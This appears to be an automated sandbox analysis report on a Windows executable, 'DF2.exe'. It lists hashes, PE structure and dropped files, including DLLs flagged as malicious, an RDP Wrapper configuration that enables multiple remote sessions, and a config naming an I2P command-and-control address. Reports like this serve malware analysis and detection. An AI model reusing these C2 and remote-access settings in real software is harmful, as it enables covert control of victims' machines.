                Malicious:false
                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):105984
                Entropy (8bit):6.285421743969757
                Encrypted:false
                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 8%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):75977
                Entropy (8bit):7.8696816318811385
                Encrypted:false
                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                MD5:E53A179BB45CD7EDD8371740D65076BD
                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                Malicious:false
                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):8568
                Entropy (8bit):4.958673415285098
                Encrypted:false
                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                MD5:27535CEE6740DFC50A78A0322415E67C
                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                Malicious:false
                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):9146880
                Entropy (8bit):6.674868432808522
                Encrypted:false
                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                MD5:676064A5CC4729E609539F9C9BD9D427
                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):4
                Entropy (8bit):2.0
                Encrypted:false
                SSDEEP:3:9:9
                MD5:006F29D8E822B9241020AEC2495EF819
                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                Malicious:false
                Preview:wgNj
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:Generic INItialization configuration [SLPolicy]
                Category:dropped
                Size (bytes):456534
                Entropy (8bit):5.450314708570292
                Encrypted:false
                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                Malicious:false
                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):115712
                Entropy (8bit):6.25860377459178
                Encrypted:false
                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):92672
                Entropy (8bit):6.229119632298774
                Encrypted:false
                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                MD5:7FEA520E80E7A73252F2A5C204BBF820
                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 32%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                Process:C:\Windows\System32\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.465558328923521
                Encrypted:false
                SSDEEP:6144:xIXfpi67eLPU9skLmb0b4FWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:SXD94FWlLZMM6YFHx+h
                MD5:525B258046B1459A56BF8E1BA0932DBA
                SHA1:29A8E572951565B34662222E1DFA78C4B7D6EB4A
                SHA-256:774AF39C73307CF1F0693ED6A5E477151CA072337D8FE4543E6FBBAB65F55C82
                SHA-512:0E7907384241DC54B069C6B654CA5226387632FD3DC7FD9EB2F7D53413113F8188E0751B835B13636245197FC99E703A1C145DB5D8B9F318C619D7EB72604E66
                Malicious:false
                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..$p\...............................................................................................................................................................................................................................................................................................................................................$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32+ executable (GUI) x86-64, for MS Windows
                Entropy (8bit):6.024900279611568
                TrID:
                • Win64 Executable GUI (202006/5) 92.64%
                • Win64 Executable (generic) (12005/4) 5.51%
                • Generic Win/DOS Executable (2004/3) 0.92%
                • DOS Executable Generic (2002/1) 0.92%
                • VXD Driver (31/22) 0.01%
                File name:DF2.exe
                File size:8'630'784 bytes
                MD5:9b41d60958d07cdfd3cbc58fbb56cea7
                SHA1:da86bea1b0de55fed13464a374e2f724ce38aee7
                SHA256:7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
                SHA512:7374b0beb3a493a9830c3e5797da38d5d02e171db6b890b43ed90f6031f3d455816af4b9a34b6bedbd8aae36785a62a68849e6e4e7383ea05c2a94e238dd6072
                SSDEEP:49152:9msYIP7Jzvi24hQ7UId5z3dxexnUSF4kPoJ8PnMX8Qodtd5yE+ghxR9scTQdZnK6:hZAIcTaKNeIo
                TLSH:D096293F62A5826DC25EC23EC0A3CF40D933B2761777C6E7629503A98F469C65E3E560
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                Icon Hash:6ab06e9aaaba8e50
                Entrypoint:0xa9bac0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:
                Time Stamp:0x6773E968 [Tue Dec 31 12:54:00 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:2
                File Version Major:5
                File Version Minor:2
                Subsystem Version Major:5
                Subsystem Version Minor:2
                Import Hash:4b0c724426c4e106290c582a91355ce6
                Instruction
                push ebp
                dec eax
                sub esp, 20h
                dec eax
                mov ebp, esp
                nop
                dec eax
                lea ecx, dword ptr [FFFECAA8h]
                call 00007F25B8A24310h
                dec eax
                mov eax, dword ptr [000952FCh]
                dec eax
                mov ecx, dword ptr [eax]
                call 00007F25B8CD9C61h
                dec eax
                mov eax, dword ptr [000952EDh]
                dec eax
                mov ecx, dword ptr [eax]
                mov dl, 01h
                call 00007F25B8CDC910h
                dec eax
                mov eax, dword ptr [000952DCh]
                dec eax
                mov ecx, dword ptr [eax]
                dec eax
                mov edx, dword ptr [FFFEC402h]
                dec esp
                mov eax, dword ptr [0009596Bh]
                call 00007F25B8CD9C63h
                dec eax
                mov eax, dword ptr [000952BFh]
                dec eax
                mov ecx, dword ptr [eax]
                call 00007F25B8CD9E74h
                call 00007F25B8A1B6CFh
                jmp 00007F25B90A8E4Ah
                nop
                nop
                call 00007F25B8A1B8C6h
                nop
                dec eax
                lea esp, dword ptr [ebp+20h]
                pop ebp
                ret
                dec eax
                nop
                dec eax
                lea eax, dword ptr [00000000h+eax]
                dec eax
                sub esp, 28h
                call 00007F25B8A1ADDCh
                dec eax
                add esp, 28h
                ret
                int3
                int3
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x7440000x9b.edata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x73d0000x4c82.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7fd0000x4f400.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x79d0000x5f6c4.pdata
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7470000x55740.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x7460000x28.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x73e3a00x11e8.idata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x7420000x1002.didata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x69ab500x69ac000e1d5edbdefa8470ed708e70ae316b79unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0x69c0000x958d80x95a00e728ee24d2475cc66ceea5a73f8db69cFalse0.23265520572263992data4.773329918622991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .bss0x7320000xad4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0x73d0000x4c820x4e0030d92391716b57610388a42d2f8980aeFalse0.24243790064102563COM executable for DOS4.288672591031705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didata0x7420000x10020x120013c09d90abeda5c97f7226fc0788cdeaFalse0.23546006944444445data3.07062482119687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .edata0x7440000x9b0x200ea9b5ef353f2b00f31694cdd665e9686False0.259765625data1.8837402034705306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .tls0x7450000x3700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0x7460000x6d0x200086260e25d75ca00748a3e4927fc1c2eFalse0.1953125data1.3848831201957763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x7470000x557400x5580007eac7ae52f98002a01d33987cda8be8False0.4668739720394737data6.468825820983243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                .pdata0x79d0000x5f6c40x5f800577d45903ada91b9202065b15a9f1398False0.49365234375data6.46142748681637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x7fd0000x4f4000x4f400dc095950f4ebe5e2e0f82e3ad44bb382False0.6100897082018928data6.810693992432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_CURSOR0x7fdfa80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                RT_CURSOR0x7fe0dc0x134dataEnglishUnited States0.4642857142857143
                RT_CURSOR0x7fe2100x134dataEnglishUnited States0.4805194805194805
                RT_CURSOR0x7fe3440x134dataEnglishUnited States0.38311688311688313
                RT_CURSOR0x7fe4780x134dataEnglishUnited States0.36038961038961037
                RT_CURSOR0x7fe5ac0x134dataEnglishUnited States0.4090909090909091
                RT_CURSOR0x7fe6e00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                RT_ICON0x7fe8140x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 00.20460607304062373
                RT_ICON0x80343c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4031791907514451
                RT_ICON0x8039a40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6814079422382672
                RT_ICON0x80424c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.517590618336887
                RT_ICON0x8050f40x5c70PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9795892494929006
                RT_STRING0x80ad640x208data0.4576923076923077
                RT_STRING0x80af6c0x594data0.35784313725490197
                RT_STRING0x80b5000x420data0.36363636363636365
                RT_STRING0x80b9200x150data0.5446428571428571
                RT_STRING0x80ba700x140data0.453125
                RT_STRING0x80bbb00xe0data0.45089285714285715
                RT_STRING0x80bc900x104data0.47307692307692306
                RT_STRING0x80bd940x48cdata0.3634020618556701
                RT_STRING0x80c2200x4b0data0.3358333333333333
                RT_STRING0x80c6d00x588data0.3516949152542373
                RT_STRING0x80cc580x344data0.4270334928229665
                RT_STRING0x80cf9c0x4ccdata0.39087947882736157
                RT_STRING0x80d4680x78cdata0.3302277432712215
                RT_STRING0x80dbf40x708data0.36777777777777776
                RT_STRING0x80e2fc0x6d4data0.37414187643020597
                RT_STRING0x80e9d00x5c8data0.3344594594594595
                RT_STRING0x80ef980x5fcdata0.3381201044386423
                RT_STRING0x80f5940x8b8PGP encrypted data0.2831541218637993
                RT_STRING0x80fe4c0x4ccdata0.3469055374592834
                RT_STRING0x8103180xc74data0.2882685069008783
                RT_STRING0x810f8c0x650data0.38366336633663367
                RT_STRING0x8115dc0x684data0.3327338129496403
                RT_STRING0x811c600x724data0.3079868708971554
                RT_STRING0x8123840x6e4data0.32029478458049887
                RT_STRING0x812a680x50cdata0.3397832817337461
                RT_STRING0x812f740x52cdata0.3368580060422961
                RT_STRING0x8134a00x588data0.3411016949152542
                RT_STRING0x813a280x3a4data0.43240343347639487
                RT_STRING0x813dcc0x3fcdata0.3686274509803922
                RT_STRING0x8141c80x4b8data0.29718543046357615
                RT_STRING0x8146800x4e4data0.33865814696485624
                RT_STRING0x814b640x398data0.28804347826086957
                RT_STRING0x814efc0x3a0data0.4267241379310345
                RT_STRING0x81529c0x1d8data0.5148305084745762
                RT_STRING0x8154740xccdata0.6666666666666666
                RT_STRING0x8155400x1b8data0.5318181818181819
                RT_STRING0x8156f80x3e8data0.38
                RT_STRING0x815ae00x3f0data0.3888888888888889
                RT_STRING0x815ed00x45cdata0.3333333333333333
                RT_STRING0x81632c0x2d8data0.33379120879120877
                RT_STRING0x8166040x428data0.40977443609022557
                RT_STRING0x816a2c0x498data0.38945578231292516
                RT_STRING0x816ec40x51cdata0.3516819571865443
                RT_STRING0x8173e00x394data0.38318777292576417
                RT_STRING0x8177740x390data0.34100877192982454
                RT_STRING0x817b040x41cdata0.37072243346007605
                RT_STRING0x817f200xd0data0.5288461538461539
                RT_STRING0x817ff00xb8data0.6467391304347826
                RT_STRING0x8180a80x298data0.4819277108433735
                RT_STRING0x8183400x438data0.3212962962962963
                RT_STRING0x8187780x344data0.39593301435406697
                RT_STRING0x818abc0x2dcdata0.38114754098360654
                RT_STRING0x818d980x34cdata0.3246445497630332
                RT_RCDATA0x8190e40x10data1.5
                RT_RCDATA0x8190f40xd70data0.44825581395348835
                RT_RCDATA0x819e640x151Delphi compiled form 'TForm1'0.7210682492581603
                RT_RCDATA0x819fb80x32053dataEnglishUnited States0.7254628251245833
                RT_GROUP_CURSOR0x84c00c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                RT_GROUP_CURSOR0x84c0200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                RT_GROUP_CURSOR0x84c0340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0x84c0480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0x84c05c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0x84c0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0x84c0840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_ICON0x84c0980x4cdata0.8289473684210527
                RT_VERSION0x84c0e40x314dataChineseChina0.45558375634517767
                DLLImport
                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                user32.dllCharNextW, LoadStringW
                kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
